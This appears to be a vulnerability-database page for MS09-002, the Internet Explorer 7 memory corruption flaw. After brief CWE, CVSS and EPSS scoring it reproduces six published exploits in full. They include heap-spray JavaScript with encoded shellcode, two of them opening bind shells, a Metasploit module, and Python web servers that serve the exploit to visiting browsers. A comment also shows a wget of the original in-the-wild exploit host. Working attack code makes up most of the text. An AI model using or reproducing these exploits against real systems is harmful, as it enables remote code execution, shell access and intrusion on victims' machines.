Related Weaknesses
CWE-ID | Weakness Name | Source
CWE-399 | Category: Resource Management Errors. Weaknesses in this category are related to improper management of system resources. |
Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 9.3 | | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0% to 100%). The higher the score, the greater the probability that the vulnerability will be exploited.
EPSS Percentile
The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile therefore lets you compare the EPSS score of one CVE against that of every other CVE.
Exploit information
Exploit Database EDB-ID : 8077
Publication date : 2009-02-17 23h00 +00:00
Author : anonymous
EDB Verified : Yes
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"
took a little but found it. /str0ke
-->
<script language="JavaScript">
var c="putyourshizhere-unescaped";
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
# milw0rm.com [2009-02-18]
Exploit Database EDB-ID : 8082
Publication date : 2009-02-19 23h00 +00:00
Author : webDEViL
EDB Verified : Yes
<!-- Calculator should spawn. changed the block size. tested on 2003 Server SP2. webDEViL -->
<script language="JavaScript">
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var array = new Array();
var ls = 0xd00000;
var b = unescape("%u0c0c%u0c0c");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u9090%u9090AAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
# milw0rm.com [2009-02-20]
Exploit Database EDB-ID : 8079
Publication date : 2009-02-19 23h00 +00:00
Author : Abysssec
EDB Verified : Yes
<!--
Internet Explorer 7 Uninitialized Memory Corruption Exploit
http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx
Abyssec Inc Public Exploits 2009/2/18
this Exploit is based on N/A PoC in Milw0rm, but the PoC was really simple to
exploit. This PoC can be exploited on DEP-Enabled Systems as well using the .Net
Shellcode trick or etc. Maybe I write a Dep-Enabled version too. And also
I should notice, this code can be modified to be more reliable ..
Feel free to visit us at : www.Abyssec.com
to contact me directly use : admin@abyssec.com
Note : Tested and Worked On XP SP2 please wait for another version
-->
<script language="JavaScript">
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evil Shellcode go ahead !!!
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
var array = new Array();
//Don't need change but for execute time you can change ;)
var calc = 0x100000-(shellcode.length*2+0x01020);
// Spray or Not :-??
var point = unescape("%u0D0D%u0D0D");
while(point.length<calc) { point+=point;}
var sec = point.substring(0,calc/2);
delete point;
for(i=0; i<0xD0; i++) {
array[i] = sec + shellcode;
}
// N/A Code
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>
# milw0rm.com [2009-02-20]
Exploit Database EDB-ID : 16555
Publication date : 2010-07-11 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: ms09_002_memory_corruption.rb 9787 2010-07-12 02:51:50Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	#
	# Superseded by ms10_018_ie_behaviors, disable for BrowserAutopwn
	#
	#include Msf::Exploit::Remote::BrowserAutopwn
	#autopwn_info({
	#	:ua_name    => HttpClients::IE,
	#	:ua_minver  => "7.0",
	#	:ua_maxver  => "7.0",
	#	:javascript => true,
	#	:os_name    => OperatingSystems::WINDOWS,
	#	:vuln_test  => nil, # no way to test without just trying it
	#})

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption',
			'Description'    => %q{
					This module exploits an error related to the CFunctionPointer function when attempting
				to access uninitialized memory. A remote attacker could exploit this vulnerability to
				corrupt memory and execute arbitrary code on the system with the privileges of the victim.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'dean [at] zerodaysolutions [dot] com' ],
			'Version'        => '$Revision: 9787 $',
			'References'     =>
				[
					[ 'CVE', '2009-0075' ],
					[ 'OSVDB', '51839' ],
					[ 'MSB', 'MS09-002' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC'             => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP2-SP3 / Windows Vista SP0 / IE 7', { 'Ret' => 0x0C0C0C0C } ]
				],
			'DisclosureDate' => 'Feb 17 2008',
			'DefaultTarget'  => 0))

		@javascript_encode_key = rand_text_alpha(rand(10) + 10)
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)
		if (!request.uri.match(/\?\w+/))
			send_local_redirect(cli, "?#{@javascript_encode_key}")
			return
		end

		# Re-generate the payload.
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode.
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Set the return.
		ret = Rex::Text.to_unescape([target.ret].pack('V'))

		# Randomize the javascript variable names.
		rand1  = rand_text_alpha(rand(100) + 1)
		rand2  = rand_text_alpha(rand(100) + 1)
		rand3  = rand_text_alpha(rand(100) + 1)
		rand4  = rand_text_alpha(rand(100) + 1)
		rand5  = rand_text_alpha(rand(100) + 1)
		rand6  = rand_text_alpha(rand(100) + 1)
		rand7  = rand_text_alpha(rand(100) + 1)
		rand8  = rand_text_alpha(rand(100) + 1)
		rand9  = rand_text_alpha(rand(100) + 1)
		rand10 = rand_text_alpha(rand(100) + 1)
		rand11 = rand_text_alpha(rand(100) + 1)
		rand12 = rand_text_alpha(rand(100) + 1)
		rand13 = rand_text_alpha(rand(100) + 1)

		fill = rand_text_alpha(25)

		js = %Q|
		var #{rand1} = unescape("#{shellcode}");
		var #{rand2} = new Array();
		var #{rand3} = 0x100000-(#{rand1}.length*2+0x01020);
		var #{rand4} = unescape("#{ret}");
		while(#{rand4}.length<#{rand3}/2)
			{#{rand4}+=#{rand4};}
		var #{rand5} = #{rand4}.substring(0,#{rand3}/2);
		delete #{rand4};
		for(#{rand6}=0;#{rand6}<0xC0;#{rand6}++) {#{rand2}[#{rand6}] = #{rand5} + #{rand1};}
		CollectGarbage();
		var #{rand7} = unescape("#{ret}"+"#{fill}");
		var #{rand8} = new Array();
		for(var #{rand9}=0;#{rand9}<1000;#{rand9}++)
			#{rand8}.push(document.createElement("img"));
		function #{rand10}()
		{
			#{rand11} = document.createElement("tbody");
			#{rand11}.click;
			var #{rand12} = #{rand11}.cloneNode();
			#{rand11}.clearAttributes();
			#{rand11}=null;
			CollectGarbage();
			for(var #{rand13}=0;#{rand13}<#{rand8}.length;#{rand13}++)
				#{rand8}[#{rand13}].src=#{rand7};
			#{rand12}.click;
		}
		window.setTimeout("#{rand10}();",800);
		|

		js = encrypt_js(js, @javascript_encode_key)

		content = %Q|<html>
<script language="JavaScript">
#{js}
</script>
</html>
|

		content = Rex::Text.randomize_space(content)

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
Exploit Database EDB-ID : 8080
Publication date : 2009-02-19 23h00 +00:00
Author : David Kennedy (ReL1K)
EDB Verified : Yes
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002)                 #
###############################################################################
#                                                                             #
# Thanks to str0ke for finding this in the wild.                              #
#                                                                             #
# Tested on Windows 2003 SP2 R2                                               #
#                                                                             #
# Written by SecureState R&D Team (ReL1K)                                     #
# http://www.securestate.com                                                  #
#                                                                             #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
#                                                                             #
###############################################################################

from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys

try:
    import psyco
    psyco.full()
except ImportError:
    pass


class myRequestHandler(BaseHTTPRequestHandler):
    try:
        def do_GET(self):
            # Always Accept GET
            self.printCustomHTTPResponse(200)
            # Site root: Main Menu
            if self.path == "/":
                target = self.client_address[0]
                self.wfile.write("""<html><head>""")
                self.wfile.write("""<div id="replace">x</div>
<script language="JavaScript">
// win32_bind - EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */
var c = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3");
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array[i] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>""")
                self.wfile.write("""<title>Microsoft Internet Explorer MS09-002 Buffer Overflow</title></head><body>""")
                self.wfile.write("""<left><body bgcolor="Black"><font color="White"><p>Exploit is running...</p><br>""")
                print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-]NetCat to IP Address: %s and port 5500 [-]" % (target))
                #print ("[-] Example: open up a command shell and type 'nc %s 5500' [-]" % (target))

        # Print custom HTTP Response
        def printCustomHTTPResponse(self, respcode):
            self.send_response(respcode)
            self.send_header("Content-type", "text/html")
            self.send_header("Server", "myRequestHandler")
            self.end_headers()

    # In case of exceptions, pass them
    except Exception:
        pass


httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
###############################################################################
MS Internet Explorer 7 Memory Corruption Exploit (MS09-002)
###############################################################################
#                                                                             #
# Thanks to Str0ke for finding this in the wild.                              #
#                                                                             #
# Tested on Windows 2003 SP2 R2                                               #
#                                                                             #
# Written by SecureState R&D Team                                             #
# http://www.securestate.com                                                  #
#                                                                             #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
#                                                                             #
###############################################################################
""")
print ("[-] Starting MS Internet Explorer 7 Memory Corruption Exploit:80 [-]")
print ("[-] Have someone connect to you on port 80 [-]")
print ("Type <control>-c to exit..")
try:
    # handle the connections
    httpd.handle_request()
    # Serve HTTP server forever
    httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
    print ("\n\nExiting exploit...\n\n")
    sys.exit()
# milw0rm.com [2009-02-20]
Exploit Database EDB-ID : 8152
Publication date : 2009-03-03 23h00 +00:00
Author : Ahmed Obied
EDB Verified : Yes
#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# - Based on the code found by str0ke in the wild for MS09-002
# - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
# Usage : python ie_ms09002.py [port]
#

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler


class RequestHandler(BaseHTTPRequestHandler):

    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
        payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
        payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
        payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
        payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
        payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
        payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
        payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
        payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
        payload += '\x0a\x02\xb1\x0e'
        return self.convert_to_utf16(payload)

    def get_exploit(self):
        exploit = '''
function spray_heap()
{
var payload = unescape("<PAYLOAD>");
var ret = 0x0c0c0c0c;
var heap_chunk_size = 0x40000;
var nopsled_size = heap_chunk_size - (payload.length * 2)
var nopsled = unescape("%u0c0c%u0c0c");
while (nopsled.length < nopsled_size)
nopsled += nopsled;
heap_chunks = new Array();
heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;
for (var i = 0 ; i < heap_chunks_num ; i++)
heap_chunks[i] = nopsled + payload;
}
function trigger_bug()
{
var obj = document.createElement("table");
obj.click;
var obj_cp = obj.cloneNode();
obj.clearAttributes();
obj = null;
CollectGarbage();
var img = document.createElement("img");
img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");
obj_cp.click;
}
if (navigator.userAgent.indexOf("MSIE 7") != -1) {
spray_heap();
trigger_bug()
} else
window.location = "about:blank"
        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = '<html><body><script>' + exploit + '</script></body></html>'
        return exploit

    def convert_to_utf16(self, payload):
        # From Beta v2.0 by Berend-Jan Wever
        # http://www.milw0rm.com/exploits/656
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i+j]) & 0xff) << (j*8)
            enc_payload += '%%u%04x' % num
        return enc_payload

    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        print '[-] Incoming connection from %s' % self.client_address[0]
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        print '[-] Sending exploit to %s ...' % self.client_address[0],
        self.wfile.write(self.get_exploit())
        print 'done'


def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    port = None
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
    except ValueError:
        print '[*] ERROR: invalid port number ...'
        sys.exit(-1)
    try:
        serv = HTTPServer(('', port), RequestHandler)
        ip = socket.gethostbyname(socket.gethostname())
        print '[-] Web server is running at http://%s:%d/' % (ip, port)
    except socket.error:
        print '[*] ERROR: a socket error has occurred ...'
        sys.exit(-1)
    try:
        serv.serve_forever()
    except KeyboardInterrupt:
        print '[-] Exiting ...'


if __name__ == '__main__':
    main()
# milw0rm.com [2009-03-04]
Products Mentioned
Configuration 0
Microsoft>>Internet_explorer >> Version 7
Microsoft>>Windows_server_2003 >> Version -
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version -
Microsoft>>Windows_vista >> Version -
Microsoft>>Windows_xp >> Version -
References